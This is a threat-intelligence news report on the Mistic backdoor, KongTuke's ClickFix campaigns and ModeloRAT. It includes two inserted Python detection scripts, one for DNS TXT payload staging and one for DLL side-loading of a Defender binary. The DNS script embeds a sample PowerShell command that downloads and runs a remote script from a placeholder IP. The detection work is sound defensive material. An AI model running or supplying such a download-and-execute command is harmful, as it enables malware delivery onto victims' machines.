Malware | Jun 25, 2026

New Mistic Backdoor Linked to KongTuke in ClickFix and ModeloRAT Campaigns

New Mistic backdoor linked to KongTuke and ModeloRAT in financially motivated attacks.

Summary

A new stealthy backdoor named Mistic, also tracked as MLTBackdoor, has been deployed in financially motivated attacks since April 2026. It is linked to the initial access broker KongTuke and is dropped alongside ModeloRAT, a Python RAT. The attacks target sectors including insurance, education, IT, and professional services, with Mistic utilizing DLL side-loading and in-memory execution for stealth.

Full text

By Ravie Lakshmanan, Jun 25, 2026 (Initial Access Broker / Ransomware)

A new, stealthy backdoor named Mistic has been deployed as part of suspected financially motivated attacks aimed at multiple organizations spanning the insurance, education, IT, and professional services sectors since April 2026.

According to Symantec and Carbon Black's Threat Hunter Team, the backdoor, also tracked as MLTBackdoor, is said to be linked to an initial access broker (IAB) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, TAG-124, and Woodgnat), and is dropped along with ModeloRAT, a Python remote access trojan (RAT) previously attributed to the group.

"The backdoor runs payloads in memory with no file written to disk and includes a kill switch that lets it delete itself, which are features consistent with an operator seeking long-term, low-visibility access," Broadcom's cybersecurity teams said in a report shared with The Hacker News.

ModeloRAT was first flagged by Huntress in January 2026 in connection with a variant of a ClickFix campaign dubbed CrashFix, in which the KongTuke actors used a malicious Google Chrome extension masquerading as an ad blocker to intentionally crash a victim's web browser and trick them into running arbitrary commands under the pretext of running a security scan.

The malware was also distributed in a different ClickFix campaign in which the command the victim was tricked into running performed a Domain Name System (DNS) lookup to retrieve the next-stage payload, with Microsoft noting that the attack chain uses DNS as a "lightweight staging or signaling channel."

Mistic's use of ClickFix as a delivery vector was highlighted by Zscaler ThreatLabz earlier this month, which attributed the activity to a ransomware-related threat actor establishing a foothold for lateral movement.
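The DNS-based ClickFix variant described above fetches its next stage through a lookup rather than an HTTP download, so the resolver log is one place it leaves a trace. The following is an added detection example, not code from the article or from any vendor it cites: it runs over constructed resolver-log answers and flags TXT responses that either decode from base64 to a printable command or carry a high-entropy blob, while skipping SPF/DKIM/DMARC-style records that are long by design. The record shape (src, qname, qtype, rdata), the sample answers, the `.invalid` domain, the staged command string and the length/entropy thresholds are all assumptions made for the example.

```python
import base64
import math
import re
from collections import Counter

# Constructed sample resolver-log answers (not real telemetry). The record
# shape (src, qname, qtype, rdata) is an assumption for this example, and
# the staged command below is made up to look like a ClickFix one-liner.
STAGED_COMMAND = ("powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                  ".DownloadString('http://198.51.100.7/s'))\"")
SAMPLE_DNS_ANSWERS = [
    {"src": "ws-0412", "qname": "example.com", "qtype": "TXT",
     "rdata": "v=spf1 include:_spf.example.com -all"},
    {"src": "ws-0412", "qname": "_dmarc.example.com", "qtype": "TXT",
     "rdata": "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"},
    {"src": "ws-0412", "qname": "cdn-update.invalid", "qtype": "TXT",
     "rdata": base64.b64encode(STAGED_COMMAND.encode()).decode()},
    {"src": "ws-0977", "qname": "example.net", "qtype": "A",
     "rdata": "203.0.113.10"},
]

# TXT records that are long by design and must not be flagged.
BENIGN_TXT_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1",
                       "google-site-verification=", "ms=")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def shannon_entropy(s):
    """Bits per character; base64 of varied text usually scores above 4."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def decode_if_base64(rdata):
    """Return the decoded text if rdata is base64 of printable ASCII, else None."""
    if not BASE64_RE.match(rdata):
        return None
    try:
        text = base64.b64decode(rdata, validate=True).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return text if text.isprintable() else None


def find_txt_staging(answers, min_len=32, min_entropy=4.0):
    """Flag TXT answers that look like a staged command or an opaque blob."""
    findings = []
    for a in answers:
        if a["qtype"].upper() != "TXT":
            continue
        rdata = a["rdata"]
        if rdata.lower().startswith(BENIGN_TXT_PREFIXES):
            continue
        if len(rdata) < min_len:
            continue
        decoded = decode_if_base64(rdata)
        entropy = shannon_entropy(rdata)
        if decoded is None and entropy < min_entropy:
            continue  # long but plain text, e.g. a human-readable notice
        findings.append({
            "src": a["src"],
            "qname": a["qname"],
            "length": len(rdata),
            "entropy": round(entropy, 2),
            "decoded": decoded,
        })
    return findings


if __name__ == "__main__":
    for f in find_txt_staging(SAMPLE_DNS_ANSWERS):
        print(f"{f['src']} {f['qname']} len={f['length']} "
              f"H={f['entropy']} decoded={f['decoded']!r}")
```

The content heuristic is a starting point, not a verdict: a stager can just as well spread a payload over several labels or use A/CNAME answers, and some legitimate services publish base64-looking TXT records. The stronger signal in a ClickFix case is the process context, such as nslookup.exe or powershell.exe launched by explorer.exe shortly after a Run-dialog paste and followed by a TXT query, so correlate resolver hits with process creation telemetry before alerting.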
The latest findings from Broadcom show that the malware relies on DLL side-loading, abusing a trusted Microsoft endpoint security binary ("MpExtMs.exe") as the host process to blend in and avoid raising red flags. The backdoor runs directly in memory and supports the capabilities typically associated with a malware family of this kind:

  • Upload or download a file
  • Move, rename, or delete a file
  • Create a folder
  • Modify the time interval after which it polls a remote server for commands
  • Execute code received from the C2 server in memory without leaving any artifacts on disk
  • Load Beacon Object Files (BOFs) to dynamically expand its capabilities
  • Terminate and delete itself

"The targeting appears to be opportunistic, with the attackers casting a wide net and then assessing which organizations they could sell access to rather than focusing on a single sector," Symantec and Carbon Black said, adding that ModeloRAT has been observed in attacks that deployed Qilin ransomware.

KongTuke is known to operate a traffic distribution system (TDS) built on compromised WordPress sites, using it to serve an ever-evolving set of lures that lead unsuspecting site visitors to malware. As recently as last month, Rapid7 and ReliaQuest revealed that the threat actor has pivoted to sending Microsoft Teams messages from a fake IT Support account to trigger an attack chain that leads to the deployment of ModeloRAT.

"The stealth of the backdoor is also notable, as is the fact that Woodgnat is also possibly behind the development of ModeloRAT, indicating a group that is quite highly skilled at the development of stealthy remote access tools," Broadcom said. "The use of custom tools in ransomware attacks is becoming a more common phenomenon, with multiple examples of ransomware groups using custom exfiltration and other tools in recent times.
Backdoor.Mistic appears to be a continuation of this trend, though it appears to be likely developed by access brokers working with ransomware affiliates rather than a ransomware group itself."

Tags: ClickFix, DLL side-loading, Initial Access Broker, Malware, Microsoft Teams, ransomware, WordPress
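The side-loading technique described in the Broadcom findings above (a trusted Microsoft binary loading a planted DLL from its own directory, MITRE ATT&CK T1574.002) leaves a characteristic pairing in image-load telemetry even when the payload itself never touches disk as a separate file. The following is an added detection example, not code from the article or from Symantec, Carbon Black or Broadcom: it runs over constructed Sysmon-style ImageLoad (Event ID 7) events and flags a watched host binary that either runs outside its expected install root or loads a co-located DLL that is not Microsoft-signed. The expected Defender install roots, the second watched binary (MpCmdRun.exe), and every path, user name, version directory and DLL name in the sample events are assumptions made for the example; the article names only MpExtMs.exe.

```python
import ntpath

# Expected install roots for Microsoft Defender platform binaries; an
# assumption for this example, not something the article states.
EXPECTED_ROOTS = (
    r"c:\program files\windows defender",
    r"c:\programdata\microsoft\windows defender\platform",
)
# Host binaries to watch. MpExtMs.exe is the one named in the article; the
# second entry is an assumption added for illustration.
WATCHED_HOSTS = {"mpextms.exe", "mpcmdrun.exe"}
# DLLs loaded from the OS directories are expected and ignored.
OS_DLL_ROOTS = (r"c:\windows\system32", r"c:\windows\syswow64")
MICROSOFT_SIGNERS = {"microsoft windows", "microsoft corporation"}

# Constructed Sysmon-style ImageLoad (EID 7) events; every path, user, DLL
# name and version directory below is made up for the example.
SAMPLE_EVENTS = [
    {"eid": 7, "host": "ws-0412",
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpExtMs.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"eid": 7, "host": "ws-0412",
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpExtMs.exe",
     "ImageLoaded": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.0.0-0\MpClient.dll",
     "Signed": "true", "Signature": "Microsoft Corporation"},
    {"eid": 7, "host": "ws-0412",
     "Image": r"C:\Users\jdoe\AppData\Roaming\SecScan\MpExtMs.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Roaming\SecScan\updater.dll",
     "Signed": "false", "Signature": ""},
    {"eid": 7, "host": "ws-0412",
     "Image": r"C:\Users\jdoe\AppData\Roaming\SecScan\MpExtMs.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll",
     "Signed": "true", "Signature": "Microsoft Windows"},
]


def _norm(path):
    """Lower-case and backslash-normalise a Windows path (works on any OS)."""
    return ntpath.normcase(path)


def _under(path, roots):
    """True if the normalised path lies below one of the given roots."""
    return any(path.startswith(root + "\\") for root in roots)


def find_sideload_candidates(events):
    """Return image-load events consistent with DLL side-loading of a watched host."""
    findings = []
    for ev in events:
        if ev.get("eid") != 7:
            continue
        host_img = _norm(ev["Image"])
        dll = _norm(ev["ImageLoaded"])
        if ntpath.basename(host_img) not in WATCHED_HOSTS:
            continue
        if _under(dll, OS_DLL_ROOTS):
            continue  # normal OS dependencies
        reasons = []
        if not _under(host_img, EXPECTED_ROOTS):
            reasons.append("host binary outside expected Defender install roots")
        same_dir = ntpath.dirname(dll) == ntpath.dirname(host_img)
        trusted = (ev.get("Signed", "").lower() == "true"
                   and ev.get("Signature", "").lower() in MICROSOFT_SIGNERS)
        if same_dir and not trusted:
            reasons.append("co-located DLL not signed by Microsoft")
        if reasons:
            findings.append({
                "host": ev["host"],
                "image": ev["Image"],
                "dll": ev["ImageLoaded"],
                "reasons": reasons,
                "severity": "high" if len(reasons) == 2 else "medium",
            })
    return findings


if __name__ == "__main__":
    for f in find_sideload_candidates(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']}: {f['image']} loaded {f['dll']} "
              f"({'; '.join(f['reasons'])})")
```

Two caveats before using this in production. Matching on the file name is the weak link: a renamed copy of the host binary slips past the watch list, so pair the rule with the OriginalFileName that Sysmon's ProcessCreate event carries from the PE version resource, or with the file hash. And because the article describes the payload running in memory, the planted DLL is only the loader; file-based scanning of it may find nothing, so treat a hit as a trigger for memory and network telemetry review (the polling C2 beacon, BOF loads) rather than as a self-contained verdict.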

Indicators of Compromise

  • malware — Mistic
  • malware — MLTBackdoor
  • malware — ModeloRAT
  • mitre_attack — T1059
  • mitre_attack — T1071.004
  • mitre_attack — T1574.002
  • mitre_attack — T1055

Entities

  • KongTuke (threat_actor)
  • Woodgnat (threat_actor)
  • Google Chrome extension (product)
  • Microsoft (vendor)